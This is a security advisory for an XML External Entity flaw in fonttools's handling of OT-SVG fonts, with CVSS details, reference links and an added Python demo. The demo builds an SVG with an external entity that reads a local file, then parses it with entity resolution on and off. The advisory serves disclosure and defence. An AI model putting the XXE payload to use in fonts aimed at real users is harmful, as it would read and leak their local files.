CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS percentile: 31.2%
fonttools is vulnerable to XML External Entity (XXE) injection. The SVG table of an OT-SVG font carries XML documents, and affected versions of fonttools parsed them with an XML parser configured to resolve external entities. An attacker can exploit this by crafting an OT-SVG font whose SVG document declares an external entity referencing a local file; when a victim processes the font with an affected version (for example by subsetting it), the file's contents are pulled into the parsed SVG, resulting in information disclosure. Fixed in fonttools 4.43.0 by disabling external entity resolution in the parser.
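The following is an added example, not code from fonttools or from the advisory. It reproduces the bug class described above: an SVG document of the kind that would be embedded in a font's SVG table declares an external entity pointing at a local file, and the same document is parsed once with external entity resolution on (the vulnerable configuration) and once with it off (the hardened one). fonttools uses lxml, where the relevant switch is the parser's resolve_entities option; to run without lxml this demo uses the stdlib xml.sax parser instead, whose equivalent switch is the feature_external_ges flag. The secret file, its contents, and the SVG document are constructed for the demo.

```python
"""Added example (not fonttools code): XXE through an SVG document of the
kind stored in an OT-SVG font's SVG table.

Assumptions: the stdlib xml.sax parser stands in for the lxml parser
fonttools uses; its feature_external_ges flag plays the role of lxml's
resolve_entities. The secret file, its content and the SVG are constructed.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax import handler


class TextCollector(handler.ContentHandler):
    """Collects character data, i.e. what an SVG <text> element would carry."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def build_malicious_svg(target_path: str) -> bytes:
    """SVG document an attacker would embed in the font's SVG table: the
    internal DTD declares an external entity backed by a local file and the
    <text> element references it, so a resolving parser inlines the file."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE svg [<!ENTITY xxe SYSTEM "{target_path}">]>\n'
        '<svg xmlns="http://www.w3.org/2000/svg" id="glyph1">'
        "<text>&xxe;</text></svg>\n"
    ).encode()


def extract_svg_text(svg_document: bytes, resolve_external_entities: bool) -> str:
    """Parse the SVG and return its character data.

    resolve_external_entities=True reproduces the vulnerable configuration
    (entity content is read from disk and inlined); False is the hardened
    configuration, where the external entity reference contributes nothing.
    """
    parser = xml.sax.make_parser()
    # The single switch that decides whether SYSTEM entities are fetched.
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(svg_document))
    return "".join(collector.chunks)


def demo() -> dict:
    """Plant a constructed secret file, then parse the same hostile SVG with
    both parser settings and return what each one yielded."""
    secret = "TOP-SECRET-TOKEN-0042"
    with tempfile.NamedTemporaryFile("wb", suffix=".txt", delete=False) as fh:
        fh.write(secret.encode() + b"\n")
        secret_path = fh.name
    try:
        svg = build_malicious_svg(secret_path)
        return {
            "secret": secret,
            "vulnerable": extract_svg_text(svg, resolve_external_entities=True),
            "hardened": extract_svg_text(svg, resolve_external_entities=False),
        }
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    result = demo()
    print("resolving parser leaked:", repr(result["vulnerable"]))
    print("hardened parser yielded:", repr(result["hardened"]))
```

In a real attack the inlined file contents end up in whatever the processing tool writes out (a subset font, an exported SVG), which is the channel back to the attacker. Note that the hardened parser raises no error: the entity reference is simply dropped, so a parser that fails closed on DOCTYPE declarations altogether is the stricter choice when fonts from untrusted sources are processed.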
www.openwall.com/lists/oss-security/2024/03/08/2
www.openwall.com/lists/oss-security/2024/03/09/1
github.com/advisories/GHSA-6673-4983-2vx5
github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c
github.com/fonttools/fonttools/releases/tag/4.43.0
github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5
lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75/